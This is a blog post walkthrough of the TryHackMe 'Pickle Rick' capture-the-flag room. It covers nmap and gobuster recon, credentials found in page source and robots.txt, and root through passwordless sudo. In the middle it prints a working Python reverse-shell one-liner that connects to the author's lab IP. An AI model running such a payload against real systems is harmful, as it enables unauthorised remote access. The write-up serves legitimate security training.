<!DOCTYPE html>













<html lang="en"
  
    data-mode="dark"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- Allow having a localized datetime different from the appearance language -->
  

  

    

    

  

  

  

  
    <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="Pickle Rick - TryHackMe" />
<meta property="og:locale" content="en" />
<meta name="description" content="This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle." />
<meta property="og:description" content="This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle." />
<link rel="canonical" href="/Blog/posts/PickleRick/" />
<meta property="og:url" content="/Blog/posts/PickleRick/" />
<meta property="og:site_name" content="N3sh47" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-09-05T11:42:24+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Pickle Rick - TryHackMe" />
<meta name="twitter:site" content="@_CyberPunk254" />
<meta name="google-site-verification" content="googlea6220aea28337f81.html" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-09-05T11:42:24+00:00","datePublished":"2022-09-05T11:42:24+00:00","description":"This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.","headline":"Pickle Rick - TryHackMe","mainEntityOfPage":{"@type":"WebPage","@id":"/Blog/posts/PickleRick/"},"url":"/Blog/posts/PickleRick/"}</script>
<!-- End Jekyll SEO tag -->

  

  <title>Pickle Rick - TryHackMe | N3sh47
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/Blog/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/Blog/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/Blog/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/Blog/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/Blog/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="N3sh47">
<meta name="application-name" content="N3sh47">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/Blog/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  

    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css">

  <link rel="stylesheet" href="/Blog/assets/css/style.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  
</head>


  <body data-spy="scroll" data-target="#toc" data-topbar-visible="true">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/Blog/" class="mx-auto">
        
          
          <img src="/Blog/assets/pictures/avatar.jpeg" alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title mt-3">
      <a href="/Blog/">N3sh47</a>
    </div>
    <div class="site-subtitle font-italic">Welcome to my InfoSec Blog</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/Blog/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/Blog/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/Blog/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/Blog/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/Blog/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    

    
      

      
      <a href="https://github.com/N3sh47" aria-label="github"
        target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/_CyberPunk254" aria-label="twitter"
        target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="
          javascript:location.href = 'mailto:' + ['example','doamin.com'].join('@')" aria-label="email"
        >
        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/Blog/feed.xml" aria-label="rss"
        >
        <i class="fas fa-rss"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper">
  <div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4">
    <span id="breadcrumb">

    

    

      

        
          <span>
            <a href="/Blog/">
              Home
            </a>
          </span>

        

      

        

      

        

          
            <span>Pickle Rick - TryHackMe</span>
          

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div id="main" class="container pl-xl-4 pr-xl-4">

        









<div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4">
    <div class="post pl-1 pr-1 pl-md-2 pr-md-2">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Add attribute 'hide-bullet' to the checkbox list -->



<!-- images -->




  
  

  
    
      
      
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  

  



<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  

  
  

  

  
  

  

  
  

  




<!-- Wrap prompt element of blockquote with the <div> tag -->







<!-- return -->





<h1 data-toc-skip>Pickle Rick - TryHackMe</h1>

<div class="post-meta text-muted">
    <!-- published date -->
    <span>
      Posted
      <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class=""
    data-ts="1662378144"
    data-df="ll"
    data-toggle="tooltip" data-placement="bottom">
  Sep  5, 2022
</em>

    </span>

    <!-- lastmod date -->
    

  

  <div class="d-flex justify-content-between">
    <!-- author -->
    <span>
      
      

      

      By

      <em>
        
          <a href="https://twitter.com/N3sh47">Munene John</a>
        
      </em>
    </span>

    <div>
      <!-- page views -->
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="528 words">
  <em>2 min</em> read</span>

    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p>This <strong>Rick and Morty</strong> themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.</p>

<p><img data-src="/Blog/assets/pictures/picklectf/pickledescription.png" alt="Room Description" data-proofer-ignore>
<em>Room Description</em>
<br /></p>
<h2 id="recon"><span class="mr-2">Recon</span><a href="#recon" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<h2 id="nmap"><span class="mr-2">Nmap</span><a href="#nmap" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>First I started off by conducting an <code style="color: green;">Nmap</code> scan on the target.
<br />
<code class="language-plaintext highlighter-rouge">$ nmap -sV -p- -vv -oN nmap 10.10.43.157 </code></p>
<div class="language-console highlighter-rouge"><div class="code-header">
        <span data-label-text="Console"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">-sV</span> <span class="nt">-p-</span> <span class="nt">-vv</span> <span class="nt">-oN</span> nmap 10.10.43.157
<span class="go">Initiating Connect Scan at 21:51
Scanning 10.10.43.157 [65535 ports]
Discovered open port 22/tcp on 10.10.43.157
Discovered open port 80/tcp on 10.10.43.157
</span></pre></td></tr></tbody></table></code></div></div>
<p><img data-src="/Blog/assets/pictures/picklectf/nmap.png" alt="Nmap Scan" data-proofer-ignore>
<em>Nmap Scan</em>
Let’s check <strong>port 80</strong></p>
<h2 id="port-80"><span class="mr-2">Port 80</span><a href="#port-80" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p><img data-src="/Blog/assets/pictures/picklectf/port80.png" alt="Port 80" data-proofer-ignore>
<em>port 80</em>
There is nothing interesting here let’s try to check the <code style="color: green;">Source Code</code>.
When you inspect the code you will see something very interesting, Saw a comment:</p>
<div class="language-console highlighter-rouge"><div class="code-header">
        <span data-label-text="Console"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>curl 10.10.73.218 
<span class="c">...
</span><span class="go">  &lt;!--

    Note to self, remember username!

    Username: R1ckRul3s

</span><span class="gp">  --&gt;</span><span class="w">
</span><span class="go">
</span><span class="gp">&lt;/body&gt;</span><span class="w">
</span><span class="gp">&lt;/html&gt;</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>
<p><img data-src="/Blog/assets/pictures/picklectf/sourcecode.png" alt="Source Code" class="shadow" data-proofer-ignore>
<em>source code inspection</em>
Now we have a <strong>Username: <code style="color: green;">R1ckRul3s</code></strong>
<br />
Let’s check for more.</p>

<p><img data-src="/Blog/assets/pictures/picklectf/gobuster.png" alt="Gobuster" data-proofer-ignore>
<em>Gobuster Scan</em></p>

<p><img data-src="/Blog/assets/pictures/picklectf/wulabl.png" alt="Robots.txt" data-proofer-ignore>
<em>Robots.txt Directory</em></p>

<p>Found something in this directory: <code style="color: green;">Wubbalubbadubdub</code>.
 This might help us somewhere. 
 <br />
 Let’s continue to gather more info about the target.
I did another directory scan with gobuster and found other hidden directories.</p>
<div class="language-console highlighter-rouge"><div class="code-header">
        <span data-label-text="Console"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://10.10.208.247/ <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-x</span> php,css,txt,js,sh
<span class="go">===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.208.247/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,php,css,txt,js
[+] Timeout:                 10s
===============================================================
2022/09/08 12:07:07 Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 882]
</span><span class="gp">/assets               (Status: 301) [Size: 315] [--&gt;</span><span class="w"> </span>http://10.10.208.247/assets/]
<span class="gp">/portal.php           (Status: 302) [Size: 0] [--&gt;</span><span class="w"> </span>/login.php]                    
<span class="go">Progress: 2760 / 1323366 (0.21%) 
</span></pre></td></tr></tbody></table></code></div></div>

<p>On the <code style="color: green;">/login.php</code> I found a login page.
<img data-src="/Blog/assets/pictures/picklectf/portal.png" alt="Portal" data-proofer-ignore>
<em>Login Portal</em>
Let’s try to use:
<br />
<strong>Username:</strong> <code style="color: green;">R1ckRul3s</code> 
<strong>Password:</strong> <code style="color: green;">Wubbalubbadubdub</code></p>

<p>After a successful login, I found a <code style="color: green;">Web shell</code>.
<img data-src="/Blog/assets/pictures/picklectf/webshell.png" alt="Web Shell" data-proofer-ignore>
<em>Web Shell</em></p>

<p>I thought of uploading a reverse payload from <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">Pentest Monkey</a> and listen using <code style="color: green;">pwncat</code>.</p>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.238.145",2001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
</pre></td></tr></tbody></table></code></div></div>
<h2 id="gain-access"><span class="mr-2">Gain Access</span><a href="#gain-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>After uploading the payload I received a reverse connection.
<img data-src="/Blog/assets/pictures/picklectf/access.png" alt="Access" data-proofer-ignore>
<em>Gained Access</em></p>
<div class="language-console highlighter-rouge"><div class="code-header">
        <span data-label-text="Console"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="gp">(local) pwncat$</span><span class="w">                                                                                                                                    
</span><span class="gp">(remote) www-data@ip-10-10-252-65:/var/www/html$</span><span class="w"> </span><span class="nb">ls</span>
<span class="go">Sup3rS3cretPickl3Ingred.txt  assets  clue.txt  denied.php  index.html  login.php  portal.php  robots.txt
</span><span class="gp">(remote) www-data@ip-10-10-252-65:/var/www/html$</span><span class="w"> </span><span class="nb">cat </span>Sup3rS3cretPickl3Ingred.txt
<span class="go">mr. meeseek hair
</span></pre></td></tr></tbody></table></code></div></div>
<p>Found the first flag: <code style="color: green;"> mr. meeseek hair</code></p>
<h2 id="priviledge-escalation"><span class="mr-2">Priviledge Escalation</span><a href="#priviledge-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>I realised <code class="language-plaintext highlighter-rouge">www-data</code> could run sudo command without password.
<img data-src="/Blog/assets/pictures/picklectf/pwned.png" alt="Machine Pwned" data-proofer-ignore>
<em>Machine Pwned</em></p>

<h2 id="summary"><span class="mr-2">Summary</span><a href="#summary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>From Nmap results, we found that we have 2 open ports:
    <ul>
      <li><code style=" color: green;">Port 22 (ssh)</code></li>
      <li><code style=" color: green;">Port 80 (http)</code></li>
    </ul>
  </li>
  <li>From <code style="color: green;">Gobuster</code> scan we found a bunch of directories but only two were helpful the others were rabbit holes. The two directories are:
    <ul>
      <li><code style=" color: green;">/robots.txt</code></li>
      <li><code style=" color: green;">/portal.php</code></li>
    </ul>
  </li>
  <li>On the <code style=" color: green;">Portal</code> directory we used <code style=" color: green;">R1ckRul3s</code> as the <strong>username</strong> and <code style=" color: green;">Wubbalubbadubdub</code> as the <strong>password</strong>.</li>
  <li>We uploaded a payload from <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">Pentest Monkey</a> on the <code style="color: green;">web shell</code>.</li>
  <li>Received a reverse connection to the machine.</li>
  <li>I realised that the user <code style=" color: green;">www-data</code> could run sudo command without password.</li>
  <li>I used <code style=" color: green;">Sudo su</code> to escalate my priviledges to <code style=" color: green;">root</code>.
<br /></li>
</ul>

<p>That Machine was easy-peasy. It was fun doing the machine. I hope you enjoyed reading through it.</p>
<iframe src="https://giphy.com/embed/d68IdpvmAHohx5NMEV" width="480" height="344" frameborder="0" class="giphy-embed" allowfullscreen=""></iframe>
<p><a href="https://giphy.com/gifs/moodman-thank-you-thankyou-d68IdpvmAHohx5NMEV"></a></p>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories -->
  
  <div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i>
    
      <a href='/Blog/categories/blogging/'>Blogging</a>,
      <a href='/Blog/categories/tryhackme/'>TryHackme</a>
  </div>
  

  <!-- tags -->
  
  <div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i>
      
      <a href="/Blog/tags/writeup/"
          class="post-tag no-text-decoration" >writeup</a>
      
  </div>
  

  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=Pickle+Rick+-+TryHackMe+-+N3sh47&url=%2FBlog%2Fposts%2FPickleRick%2F" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=Pickle+Rick+-+TryHackMe+-+N3sh47&u=%2FBlog%2Fposts%2FPickleRick%2F" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://t.me/share/url?url=%2FBlog%2Fposts%2FPickleRick%2F&text=Pickle+Rick+-+TryHackMe+-+N3sh47" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        data-title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted">

    <div class="access">
      















      















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/Blog/tags/walkthrough/">walkthrough</a>
    
      
      <a class="post-tag" href="/Blog/tags/writeup/">writeup</a>
    

    </div>
  </div>


    </div>

    
      
      



<!-- BS-toc.js will be loaded at medium priority -->
<script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div>


    
  </div>

</div>

<!-- tail -->

<div class="row">
  <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4">
    
      
      <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  
    
  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->



  
    
    
      
      
    
  
    
    
  
    
    
      
      
    
  



  <div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/Blog/posts/BountyHacker/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1662273744"
    data-df="ll"
    >
  Sep  4, 2022
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Bounty Hacker - TryHackMe</h3>
            <div class="text-muted small">
              <p>
                





                You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!
Bounty Hacker is a room in TryHackMe. In this articl...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/Blog/posts/BasicPentesting/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1662604694"
    data-df="ll"
    >
  Sep  8, 2022
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Basic Pentesting - TryHackMe</h3>
            <div class="text-muted small">
              <p>
                





                In these set of tasks you’ll learn the following: brute forcing, hash cracking, service enumeration and Linux Enumeration. The main goal here is to learn as much as possible.

Room Description
Reco...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->


    
      
      <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/Blog/posts/BountyHacker/" class="btn btn-outline-primary"
    prompt="Older">
    <p>Bounty Hacker - TryHackMe</p>
  </a>
  

  
  <a href="/Blog/posts/BasicPentesting/" class="btn btn-outline-primary"
    prompt="Newer">
    <p>Basic Pentesting - TryHackMe</p>
  </a>
  

</div>

    
      
      <!--  The comments switcher -->


    
  </div>
</div>



        <!-- The Footer -->

<footer class="row pl-3 pr-3">
  <div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0">
    <div class="footer-left">
      <p class="mb-0">
        © 2022
        <a href="https://twitter.com/N3sh47">Munene John</a>.
        
        <span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
        
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        

        

        Powered by 
          <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
         with 
          <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a>
         theme.

      </p>
    </div>

  </div>

</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/Blog/tags/walkthrough/">walkthrough</a>
    
      
      <a class="post-tag" href="/Blog/tags/writeup/">writeup</a>
    

    </div>
  </div>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    

    <div id="mask"></div>

